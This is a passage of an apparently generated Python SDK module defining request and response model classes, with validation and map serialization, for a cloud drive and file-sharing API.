        # limit, page size (0-100), see validate()
        self.limit = limit
        # location
        self.location = location
        # marker, paging cursor from a previous response
        self.marker = marker
        # order_by
        self.order_by = order_by
        # order_direction
        self.order_direction = order_direction
        # parent file ID, required, see validate()
        self.parent_file_id = parent_file_id
        self.parent_file_id_path = parent_file_id_path
        self.referer = referer
        # share_id, either share_id or drive_id is required
        self.share_id = share_id
        self.sign_token = sign_token
        # starred
        self.starred = starred
        # status
        self.status = status
        # type
        self.type = type
        # url_expire_sec (10-14400), see validate()
        self.url_expire_sec = url_expire_sec
        # video_thumbnail_process (type: string)
        # NOTE: the generator previously emitted a stray `type:string`
        # statement here; it is documentation, kept as a comment.
        self.video_thumbnail_process = video_thumbnail_process

    def validate(self):
        """Check required fields and value constraints (raises on failure)."""
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.limit is not None:
            self.validate_maximum(self.limit, 'limit', 100)
            self.validate_minimum(self.limit, 'limit', 0)
        self.validate_required(self.parent_file_id, 'parent_file_id')
        if self.parent_file_id is not None:
            self.validate_max_length(self.parent_file_id, 'parent_file_id', 50)
            self.validate_pattern(self.parent_file_id, 'parent_file_id', '[a-z0-9.-_]{1,50}')
        if self.url_expire_sec is not None:
            self.validate_maximum(self.url_expire_sec, 'url_expire_sec', 14400)
            self.validate_minimum(self.url_expire_sec, 'url_expire_sec', 10)

    def to_map(self):
        """Serialize the set (non-None) fields into a plain dict."""
        result = dict()
        # every map key equals its attribute name for this model
        for name in (
            'addition_data', 'all', 'category', 'drive_id', 'fields',
            'image_cropping_aspect_ratios', 'image_thumbnail_process',
            'image_url_process', 'limit', 'location', 'marker', 'order_by',
            'order_direction', 'parent_file_id', 'parent_file_id_path',
            'referer', 'share_id', 'sign_token', 'starred', 'status', 'type',
            'url_expire_sec', 'video_thumbnail_process',
        ):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from a dict, skipping absent/None keys; return self."""
        m = m or dict()
        for name in (
            'addition_data', 'all', 'category', 'drive_id', 'fields',
            'image_cropping_aspect_ratios', 'image_thumbnail_process',
            'image_url_process', 'limit', 'location', 'marker', 'order_by',
            'order_direction', 'parent_file_id', 'parent_file_id_path',
            'referer', 'share_id', 'sign_token', 'starred', 'status', 'type',
            'url_expire_sec', 'video_thumbnail_process',
        ):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class ListMyDriveRequest(TeaModel):
    """
    List-my-drives request.
    """

    def __init__(
        self,
        headers: Dict[str, str] = None,
        limit: int = None,
        marker: str = None,
    ):
        self.headers = headers
        # page size limit (1-100)
        self.limit = limit
        # paging marker, the value returned by a previous call
        self.marker = marker

    def validate(self):
        # limit, when present, must fall within [1, 100]
        if self.limit is not None:
            self.validate_maximum(self.limit, 'limit', 100)
            self.validate_minimum(self.limit, 'limit', 1)

    def to_map(self):
        # emit only the fields that are set
        result = dict()
        for name in ('headers', 'limit', 'marker'):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        # copy only the keys present in the map
        m = m or dict()
        for name in ('headers', 'limit', 'marker'):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class ListShareLinkRequest(TeaModel):
    """
    list_share_link request.
    """

    def __init__(
        self,
        creator: str = None,
        limit: int = None,
        marker: str = None,
    ):
        # creator
        self.creator = creator
        # limit, page size (1-100)
        self.limit = limit
        # marker, paging cursor
        self.marker = marker

    def validate(self):
        # limit, when present, must fall within [1, 100]
        if self.limit is not None:
            self.validate_maximum(self.limit, 'limit', 100)
            self.validate_minimum(self.limit, 'limit', 1)

    def to_map(self):
        # emit only the fields that are set
        result = dict()
        for name in ('creator', 'limit', 'marker'):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        # copy only the keys present in the map
        m = m or dict()
        for name in ('creator', 'limit', 'marker'):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class ListShareRequest(TeaModel):
    """
    List share request.
    """

    def __init__(
        self,
        headers: Dict[str, str] = None,
        creator: str = None,
        drive_id: str = None,
        limit: int = None,
        marker: str = None,
        owner: str = None,
        owner_type: str = None,
        share_file_path: str = None,
    ):
        self.headers = headers
        # creator
        self.creator = creator
        # drive_id (digits only), see validate()
        self.drive_id = drive_id
        # limit, page size (1-100)
        self.limit = limit
        # marker, paging cursor
        self.marker = marker
        # owner
        self.owner = owner
        # owner_type
        self.owner_type = owner_type
        # share_file_path
        self.share_file_path = share_file_path

    def validate(self):
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.limit is not None:
            self.validate_maximum(self.limit, 'limit', 100)
            self.validate_minimum(self.limit, 'limit', 1)

    def to_map(self):
        # emit only the fields that are set
        result = dict()
        for name in (
            'headers', 'creator', 'drive_id', 'limit',
            'marker', 'owner', 'owner_type', 'share_file_path',
        ):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        # copy only the keys present in the map
        m = m or dict()
        for name in (
            'headers', 'creator', 'drive_id', 'limit',
            'marker', 'owner', 'owner_type', 'share_file_path',
        ):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class ListStoreFileRequest(TeaModel):
    """
    List store file request.
    """

    def __init__(
        self,
        headers: Dict[str, str] = None,
        limit: int = None,
        marker: str = None,
        parent_file_path: str = None,
        store_id: str = None,
        type: str = None,
    ):
        self.headers = headers
        # limit, page size (1-1000)
        self.limit = limit
        # marker, paging cursor
        self.marker = marker
        # parent_file_path
        self.parent_file_path = parent_file_path
        # store_id
        self.store_id = store_id
        # type
        self.type = type

    def validate(self):
        # limit, when present, must fall within [1, 1000]
        if self.limit is not None:
            self.validate_maximum(self.limit, 'limit', 1000)
            self.validate_minimum(self.limit, 'limit', 1)

    def to_map(self):
        # emit only the fields that are set
        result = dict()
        for name in (
            'headers', 'limit', 'marker',
            'parent_file_path', 'store_id', 'type',
        ):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        # copy only the keys present in the map
        m = m or dict()
        for name in (
            'headers', 'limit', 'marker',
            'parent_file_path', 'store_id', 'type',
        ):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class ListStoreRequest(TeaModel):
    """
    List storage request.
    """

    def __init__(
        self,
        domain_id: str = None,
    ):
        # domain_id
        self.domain_id = domain_id

    def validate(self):
        # no constraints on this model
        pass

    def to_map(self):
        result = dict()
        if self.domain_id is None:
            return result
        result['domain_id'] = self.domain_id
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        domain_id = m.get('domain_id')
        if domain_id is not None:
            self.domain_id = domain_id
        return self
class ListUploadedPartRequest(TeaModel):
    """
    List the parts already uploaded for an upload_id.
    """

    def __init__(
        self,
        drive_id: str = None,
        file_id: str = None,
        file_id_path: str = None,
        limit: int = None,
        part_number_marker: int = None,
        share_id: str = None,
        upload_id: str = None,
    ):
        # drive_id (digits only), required, see validate()
        self.drive_id = drive_id
        # file_id, required, see validate()
        self.file_id = file_id
        self.file_id_path = file_id_path
        # limit, page size (1-1000)
        self.limit = limit
        # part_number_marker, paging cursor (>= 1)
        self.part_number_marker = part_number_marker
        self.share_id = share_id
        # upload_id
        self.upload_id = upload_id

    def validate(self):
        self.validate_required(self.drive_id, 'drive_id')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.file_id, 'file_id')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
        if self.limit is not None:
            self.validate_pattern(self.limit, 'limit', '[0-9]+')
            self.validate_maximum(self.limit, 'limit', 1000)
            self.validate_minimum(self.limit, 'limit', 1)
        if self.part_number_marker is not None:
            self.validate_pattern(self.part_number_marker, 'part_number_marker', '[0-9]+')
            self.validate_minimum(self.part_number_marker, 'part_number_marker', 1)

    def to_map(self):
        # emit only the fields that are set
        result = dict()
        for name in (
            'drive_id', 'file_id', 'file_id_path', 'limit',
            'part_number_marker', 'share_id', 'upload_id',
        ):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        # copy only the keys present in the map
        m = m or dict()
        for name in (
            'drive_id', 'file_id', 'file_id_path', 'limit',
            'part_number_marker', 'share_id', 'upload_id',
        ):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class MoveFileRequest(TeaModel):
    """
    Move file request.
    """

    def __init__(
        self,
        auto_rename: bool = None,
        drive_id: str = None,
        file_id: str = None,
        file_id_path: str = None,
        new_name: str = None,
        share_id: str = None,
        to_drive_id: str = None,
        to_parent_file_id: str = None,
        to_share_id: str = None,
    ):
        # auto_rename
        self.auto_rename = auto_rename
        # drive_id (digits only), required, see validate()
        self.drive_id = drive_id
        # file_id, required, see validate()
        self.file_id = file_id
        self.file_id_path = file_id_path
        # new_name (max length 1024)
        self.new_name = new_name
        self.share_id = share_id
        # to_drive_id, destination drive
        self.to_drive_id = to_drive_id
        # to_parent_file_id, destination folder, required
        self.to_parent_file_id = to_parent_file_id
        self.to_share_id = to_share_id

    def validate(self):
        self.validate_required(self.drive_id, 'drive_id')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.file_id, 'file_id')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
        if self.new_name is not None:
            self.validate_max_length(self.new_name, 'new_name', 1024)
        if self.to_drive_id is not None:
            self.validate_pattern(self.to_drive_id, 'to_drive_id', '[0-9]+')
        self.validate_required(self.to_parent_file_id, 'to_parent_file_id')
        if self.to_parent_file_id is not None:
            self.validate_max_length(self.to_parent_file_id, 'to_parent_file_id', 50)
        if self.to_share_id is not None:
            self.validate_pattern(self.to_share_id, 'to_share_id', '[0-9]+')

    def to_map(self):
        # emit only the fields that are set
        result = dict()
        for name in (
            'auto_rename', 'drive_id', 'file_id', 'file_id_path', 'new_name',
            'share_id', 'to_drive_id', 'to_parent_file_id', 'to_share_id',
        ):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        # copy only the keys present in the map
        m = m or dict()
        for name in (
            'auto_rename', 'drive_id', 'file_id', 'file_id_path', 'new_name',
            'share_id', 'to_drive_id', 'to_parent_file_id', 'to_share_id',
        ):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class PlayMediaRequest(TeaModel):
    """
    play_media request.

    Note: unlike most models in this module, the wire keys are PascalCase
    (AuthKey / DriveID / FileID) rather than the attribute names.
    """

    # (attribute, wire key) pairs used by to_map/from_map
    _PAIRS = (
        ('auth_key', 'AuthKey'),
        ('drive_id', 'DriveID'),
        ('file_id', 'FileID'),
    )

    def __init__(
        self,
        auth_key: str = None,
        drive_id: str = None,
        file_id: str = None,
    ):
        # auth_key, required, lowercase alphanumerics
        self.auth_key = auth_key
        # drive_id (digits only), required
        self.drive_id = drive_id
        # file_id, required
        self.file_id = file_id

    def validate(self):
        self.validate_required(self.auth_key, 'auth_key')
        if self.auth_key is not None:
            self.validate_pattern(self.auth_key, 'auth_key', '[a-z0-9]+')
        self.validate_required(self.drive_id, 'drive_id')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.file_id, 'file_id')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')

    def to_map(self):
        # emit only the fields that are set, under their PascalCase keys
        result = dict()
        for attr, key in self._PAIRS:
            value = getattr(self, attr)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        # copy only the PascalCase keys present in the map
        m = m or dict()
        for attr, key in self._PAIRS:
            if m.get(key) is not None:
                setattr(self, attr, m.get(key))
        return self
class RefreshOfficeEditTokenRequest(TeaModel):
    """
    Refresh the online-edit credential for an office document.
    """

    def __init__(
        self,
        addition_data: dict = None,
        location: str = None,
        office_access_token: str = None,
        office_refresh_token: str = None,
    ):
        # addition_data
        self.addition_data = addition_data
        # location
        self.location = location
        # access token, required
        self.office_access_token = office_access_token
        # refresh token, required
        self.office_refresh_token = office_refresh_token

    def validate(self):
        # both tokens are mandatory
        self.validate_required(self.office_access_token, 'office_access_token')
        self.validate_required(self.office_refresh_token, 'office_refresh_token')

    def to_map(self):
        # emit only the fields that are set
        result = dict()
        for name in (
            'addition_data', 'location',
            'office_access_token', 'office_refresh_token',
        ):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        # copy only the keys present in the map
        m = m or dict()
        for name in (
            'addition_data', 'location',
            'office_access_token', 'office_refresh_token',
        ):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class ScanFileMetaRequest(TeaModel):
    """
    Request body for a full scan of file metadata in a drive.
    """

    def __init__(
        self,
        addition_data: dict = None,
        category: str = None,
        drive_id: str = None,
        image_cropping_aspect_ratios: List[str] = None,
        image_thumbnail_process: str = None,
        image_url_process: str = None,
        limit: int = None,
        marker: str = None,
        video_thumbnail_process: str = None,
    ):
        # addition_data
        self.addition_data = addition_data
        # category
        self.category = category
        # drive_id (digits only), required, see validate()
        self.drive_id = drive_id
        self.image_cropping_aspect_ratios = image_cropping_aspect_ratios
        # image_thumbnail_process
        self.image_thumbnail_process = image_thumbnail_process
        # image_url_process
        self.image_url_process = image_url_process
        # limit, page size (1-5000), see validate()
        self.limit = limit
        # marker, paging cursor
        self.marker = marker
        # video_thumbnail_process (type: string)
        # NOTE: the generator previously emitted a stray `type:string`
        # statement here; it is documentation, kept as a comment.
        self.video_thumbnail_process = video_thumbnail_process

    def validate(self):
        """Check required fields and value constraints (raises on failure)."""
        self.validate_required(self.drive_id, 'drive_id')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.limit is not None:
            self.validate_maximum(self.limit, 'limit', 5000)
            self.validate_minimum(self.limit, 'limit', 1)

    def to_map(self):
        """Serialize the set (non-None) fields into a plain dict."""
        result = dict()
        # every map key equals its attribute name for this model
        for name in (
            'addition_data', 'category', 'drive_id',
            'image_cropping_aspect_ratios', 'image_thumbnail_process',
            'image_url_process', 'limit', 'marker', 'video_thumbnail_process',
        ):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from a dict, skipping absent/None keys; return self."""
        m = m or dict()
        for name in (
            'addition_data', 'category', 'drive_id',
            'image_cropping_aspect_ratios', 'image_thumbnail_process',
            'image_url_process', 'limit', 'marker', 'video_thumbnail_process',
        ):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class SearchFileRequest(TeaModel):
    """
    Search file metadata request.
    """

    def __init__(
        self,
        addition_data: dict = None,
        drive_id: str = None,
        image_cropping_aspect_ratios: List[str] = None,
        image_thumbnail_process: str = None,
        image_url_process: str = None,
        limit: int = None,
        location: str = None,
        marker: str = None,
        order_by: str = None,
        query: str = None,
        referer: str = None,
        return_total_count: bool = None,
        sign_token: str = None,
        url_expire_sec: int = None,
        video_thumbnail_process: str = None,
    ):
        # addition_data
        self.addition_data = addition_data
        # drive_id (digits only), required, see validate()
        self.drive_id = drive_id
        self.image_cropping_aspect_ratios = image_cropping_aspect_ratios
        # image_thumbnail_process
        self.image_thumbnail_process = image_thumbnail_process
        # image_url_process
        self.image_url_process = image_url_process
        # limit, page size (1-100), see validate()
        self.limit = limit
        # location
        self.location = location
        # marker, paging cursor
        self.marker = marker
        # order_by
        self.order_by = order_by
        # query string (max length 4096), see validate()
        self.query = query
        # referer
        self.referer = referer
        # return_total_count: whether to return the total match count
        self.return_total_count = return_total_count
        # sign_token
        self.sign_token = sign_token
        # url_expire_sec (10-14400), see validate()
        self.url_expire_sec = url_expire_sec
        # video_thumbnail_process (type: string)
        # NOTE: the generator previously emitted a stray `type:string`
        # statement here; it is documentation, kept as a comment.
        self.video_thumbnail_process = video_thumbnail_process

    def validate(self):
        """Check required fields and value constraints (raises on failure)."""
        self.validate_required(self.drive_id, 'drive_id')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.limit is not None:
            self.validate_maximum(self.limit, 'limit', 100)
            self.validate_minimum(self.limit, 'limit', 1)
        if self.query is not None:
            self.validate_max_length(self.query, 'query', 4096)
        if self.url_expire_sec is not None:
            self.validate_maximum(self.url_expire_sec, 'url_expire_sec', 14400)
            self.validate_minimum(self.url_expire_sec, 'url_expire_sec', 10)

    def to_map(self):
        """Serialize the set (non-None) fields into a plain dict."""
        result = dict()
        # every map key equals its attribute name for this model
        for name in (
            'addition_data', 'drive_id', 'image_cropping_aspect_ratios',
            'image_thumbnail_process', 'image_url_process', 'limit',
            'location', 'marker', 'order_by', 'query', 'referer',
            'return_total_count', 'sign_token', 'url_expire_sec',
            'video_thumbnail_process',
        ):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from a dict, skipping absent/None keys; return self."""
        m = m or dict()
        for name in (
            'addition_data', 'drive_id', 'image_cropping_aspect_ratios',
            'image_thumbnail_process', 'image_url_process', 'limit',
            'location', 'marker', 'order_by', 'query', 'referer',
            'return_total_count', 'sign_token', 'url_expire_sec',
            'video_thumbnail_process',
        ):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class UCGetObjectInfoByObjectKeyRequest(TeaModel):
    """
    Request to look up object info by its object key.
    """

    def __init__(
        self,
        object_key: str = None,
    ):
        # the object key to look up
        self.object_key = object_key

    def validate(self):
        # no constraints on this model
        pass

    def to_map(self):
        result = dict()
        if self.object_key is None:
            return result
        result['object_key'] = self.object_key
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        object_key = m.get('object_key')
        if object_key is not None:
            self.object_key = object_key
        return self
class UCGetObjectInfoBySha1Request(TeaModel):
    """
    Request to look up object info by its SHA-1 digest.

    Note: the attribute is ``sha_1`` but the wire key is ``sha1``.
    """

    def __init__(
        self,
        sha_1: str = None,
    ):
        # SHA-1 digest of the object
        self.sha_1 = sha_1

    def validate(self):
        # no constraints on this model
        pass

    def to_map(self):
        result = dict()
        if self.sha_1 is None:
            return result
        result['sha1'] = self.sha_1
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        digest = m.get('sha1')
        if digest is not None:
            self.sha_1 = digest
        return self
class UpdateDriveRequest(TeaModel):
    """
    Update drive request.
    """

    def __init__(
        self,
        headers: Dict[str, str] = None,
        description: str = None,
        drive_id: str = None,
        drive_name: str = None,
        encrypt_data_access: bool = None,
        encrypt_mode: str = None,
        status: str = None,
        total_size: int = None,
    ):
        self.headers = headers
        # description (max length 1024)
        self.description = description
        # drive ID, required
        self.drive_id = drive_id
        # drive name (max length 1024)
        self.drive_name = drive_name
        # whether access to encrypted data is authorized
        self.encrypt_data_access = encrypt_data_access
        # encryption mode
        self.encrypt_mode = encrypt_mode
        # status
        self.status = status
        # total size in bytes (-1 means unlimited)
        self.total_size = total_size

    def validate(self):
        if self.description is not None:
            self.validate_max_length(self.description, 'description', 1024)
        self.validate_required(self.drive_id, 'drive_id')
        if self.drive_name is not None:
            self.validate_max_length(self.drive_name, 'drive_name', 1024)

    def to_map(self):
        # emit only the fields that are set
        result = dict()
        for name in (
            'headers', 'description', 'drive_id', 'drive_name',
            'encrypt_data_access', 'encrypt_mode', 'status', 'total_size',
        ):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        # copy only the keys present in the map
        m = m or dict()
        for name in (
            'headers', 'description', 'drive_id', 'drive_name',
            'encrypt_data_access', 'encrypt_mode', 'status', 'total_size',
        ):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class UpdateFileMetaRequest(TeaModel):
    """
    Update file metadata request.
    """

    def __init__(
        self,
        check_name_mode: str = None,
        custom_index_key: str = None,
        description: str = None,
        drive_id: str = None,
        encrypt_mode: str = None,
        file_id: str = None,
        file_id_path: str = None,
        hidden: bool = None,
        labels: List[str] = None,
        meta: str = None,
        name: str = None,
        referer: str = None,
        share_id: str = None,
        sign_token: str = None,
        starred: bool = None,
        user_meta: str = None,
    ):
        # check_name_mode
        self.check_name_mode = check_name_mode
        self.custom_index_key = custom_index_key
        # description (type: string, max length 1024), see validate()
        # NOTE: the generator previously emitted stray `type: ...`
        # statements for this and the fields below; they are
        # documentation, kept as comments.
        self.description = description
        # drive_id (digits only), required, see validate()
        self.drive_id = drive_id
        self.encrypt_mode = encrypt_mode
        # file_id, required, see validate()
        self.file_id = file_id
        self.file_id_path = file_id_path
        # hidden (type: boolean)
        self.hidden = hidden
        # labels
        self.labels = labels
        self.meta = meta
        # name (max length 1024), see validate()
        self.name = name
        self.referer = referer
        self.share_id = share_id
        self.sign_token = sign_token
        # starred (type: boolean)
        self.starred = starred
        # user_meta
        self.user_meta = user_meta

    def validate(self):
        """Check required fields and value constraints (raises on failure)."""
        if self.description is not None:
            self.validate_max_length(self.description, 'description', 1024)
        self.validate_required(self.drive_id, 'drive_id')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.file_id, 'file_id')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
        if self.name is not None:
            self.validate_max_length(self.name, 'name', 1024)

    def to_map(self):
        """Serialize the set (non-None) fields into a plain dict."""
        result = dict()
        # every map key equals its attribute name for this model
        for name in (
            'check_name_mode', 'custom_index_key', 'description', 'drive_id',
            'encrypt_mode', 'file_id', 'file_id_path', 'hidden', 'labels',
            'meta', 'name', 'referer', 'share_id', 'sign_token', 'starred',
            'user_meta',
        ):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from a dict, skipping absent/None keys; return self."""
        m = m or dict()
        for name in (
            'check_name_mode', 'custom_index_key', 'description', 'drive_id',
            'encrypt_mode', 'file_id', 'file_id_path', 'hidden', 'labels',
            'meta', 'name', 'referer', 'share_id', 'sign_token', 'starred',
            'user_meta',
        ):
            if m.get(name) is not None:
                setattr(self, name, m.get(name))
        return self
class UpdateShareRequest(TeaModel):
    """
    update share request
    """

    # Scalar fields copied verbatim between the model and its map form,
    # in wire order.
    _PLAIN_FIELDS = ('description', 'expiration', 'permissions',
                     'share_id', 'share_name')

    def __init__(
        self,
        headers: Dict[str, str] = None,
        description: str = None,
        expiration: str = None,
        permissions: List[str] = None,
        share_id: str = None,
        share_name: str = None,
        share_policy: List[SharePermissionPolicy] = None,
        status: str = None,
    ):
        self.headers = headers
        # description (validated to at most 1024 characters)
        self.description = description
        # expiration
        self.expiration = expiration
        # permissions
        self.permissions = permissions
        # share_id (required)
        self.share_id = share_id
        # share_name
        self.share_name = share_name
        # share_policy entries, each validated individually
        self.share_policy = share_policy
        # status
        self.status = status

    def validate(self):
        if self.description is not None:
            self.validate_max_length(self.description, 'description', 1024)
        self.validate_required(self.share_id, 'share_id')
        if self.share_policy:
            for policy in self.share_policy:
                if policy:
                    policy.validate()

    def to_map(self):
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        for key in self._PLAIN_FIELDS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        # share_policy is always emitted (possibly empty), each entry as a
        # nested map.
        result['share_policy'] = []
        if self.share_policy is not None:
            for policy in self.share_policy:
                result['share_policy'].append(policy.to_map() if policy else None)
        if self.status is not None:
            result['status'] = self.status
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        for key in self._PLAIN_FIELDS:
            if m.get(key) is not None:
                setattr(self, key, m.get(key))
        # share_policy is unconditionally reset, then rebuilt from nested maps.
        self.share_policy = []
        if m.get('share_policy') is not None:
            for item in m.get('share_policy'):
                self.share_policy.append(SharePermissionPolicy().from_map(item))
        if m.get('status') is not None:
            self.status = m.get('status')
        return self
class CreateUserResponse(TeaModel):
    """
    Create user response
    """

    # Serializable attribute names, in wire order.
    _FIELDS = (
        'avatar', 'created_at', 'default_drive_id', 'description',
        'domain_id', 'email', 'nick_name', 'phone', 'role', 'status',
        'updated_at', 'user_data', 'user_id', 'user_name',
    )

    def __init__(
        self,
        avatar: str = None,
        created_at: int = None,
        default_drive_id: str = None,
        description: str = None,
        domain_id: str = None,
        email: str = None,
        nick_name: str = None,
        phone: str = None,
        role: str = None,
        status: str = None,
        updated_at: int = None,
        user_data: dict = None,
        user_id: str = None,
        user_name: str = None,
    ):
        # avatar
        self.avatar = avatar
        # user creation time
        self.created_at = created_at
        # default Drive ID
        self.default_drive_id = default_drive_id
        # user remarks
        self.description = description
        # Domain ID
        self.domain_id = domain_id
        # email address
        self.email = email
        # nickname
        self.nick_name = nick_name
        # phone number
        self.phone = phone
        # role
        self.role = role
        # user status
        self.status = status
        # user last-modified time
        self.updated_at = updated_at
        # user-defined JSON data; usable for config items or small transient
        # data; at most 1 KB
        self.user_data = user_data
        # user ID
        self.user_id = user_id
        # user name
        self.user_name = user_name

    def validate(self):
        pass

    def to_map(self):
        # Emit only the attributes that are set, preserving field order.
        result = dict()
        for key in self._FIELDS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for key in self._FIELDS:
            if m.get(key) is not None:
                setattr(self, key, m.get(key))
        return self
class CreateUserModel(TeaModel):
    """Response wrapper: HTTP headers plus a CreateUserResponse body."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: CreateUserResponse = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        # The body is required, and must itself be valid.
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            # Nested model serializes to its own map.
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        headers = m.get('headers')
        if headers is not None:
            self.headers = headers
        if m.get('body') is not None:
            self.body = CreateUserResponse().from_map(m['body'])
        return self
class DeleteUserModel(TeaModel):
    """Response wrapper for user deletion: headers only, no body."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
    ):
        self.headers = headers

    def validate(self):
        pass

    def to_map(self):
        result = dict()
        headers = self.headers
        if headers is not None:
            result['headers'] = headers
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        headers = m.get('headers')
        if headers is not None:
            self.headers = headers
        return self
class GetUserResponse(TeaModel):
    """
    Get user response
    """

    # Serializable attribute names, in wire order.
    _FIELDS = (
        'avatar', 'created_at', 'default_drive_id', 'description',
        'domain_id', 'email', 'nick_name', 'phone', 'role', 'status',
        'updated_at', 'user_data', 'user_id', 'user_name',
    )

    def __init__(
        self,
        avatar: str = None,
        created_at: int = None,
        default_drive_id: str = None,
        description: str = None,
        domain_id: str = None,
        email: str = None,
        nick_name: str = None,
        phone: str = None,
        role: str = None,
        status: str = None,
        updated_at: int = None,
        user_data: dict = None,
        user_id: str = None,
        user_name: str = None,
    ):
        # avatar
        self.avatar = avatar
        # user creation time
        self.created_at = created_at
        # default Drive ID
        self.default_drive_id = default_drive_id
        # user remarks
        self.description = description
        # Domain ID
        self.domain_id = domain_id
        # email address
        self.email = email
        # nickname
        self.nick_name = nick_name
        # phone number
        self.phone = phone
        # role
        self.role = role
        # user status
        self.status = status
        # user last-modified time
        self.updated_at = updated_at
        # user-defined JSON data; usable for config items or small transient
        # data; at most 1 KB
        self.user_data = user_data
        # user ID
        self.user_id = user_id
        # user name
        self.user_name = user_name

    def validate(self):
        pass

    def to_map(self):
        # Emit only the attributes that are set, preserving field order.
        result = dict()
        for key in self._FIELDS:
            value = getattr(self, key)
            if value is not None:
                result[key] = value
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        for key in self._FIELDS:
            if m.get(key) is not None:
                setattr(self, key, m.get(key))
        return self
class GetUserModel(TeaModel):
    """Response wrapper: HTTP headers plus a GetUserResponse body."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: GetUserResponse = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        # The body is required, and must itself be valid.
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            # Nested model serializes to its own map.
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        headers = m.get('headers')
        if headers is not None:
            self.headers = headers
        if m.get('body') is not None:
            self.body = GetUserResponse().from_map(m['body'])
        return self
class BaseUserResponse(TeaModel):
    """
    Base user response
    """

    # Serializable attribute names, in wire order.
    _FIELDS = (
        'avatar', 'created_at', 'default_drive_id', 'description',
        'domain_id', 'email', 'nick_name', 'phone', 'role', 'status',
        'updated_at', 'user_data', 'user_id', 'user_name',
    )

    def __init__(
        self,
        avatar: str = None,
        created_at: int = None,
        default_drive_id: str = None,
        description: str = None,
        domain_id: str = None,
        email: str = None,
        nick_name: str = None,
        phone: str = None,
        role: str = None,
        status: str = None,
        updated_at: int = None,
        user_data: dict = None,
        user_id: str = None,
        user_name: str = None,
    ):
        # avatar
        self.avatar = avatar
        # user creation time
        self.created_at = created_at
        # default Drive ID
        self.default_drive_id = default_drive_id
        # user remarks
        self.description = description
        # Domain ID
        self.domain_id = domain_id
        # email address
        self.email = email
        # nickname
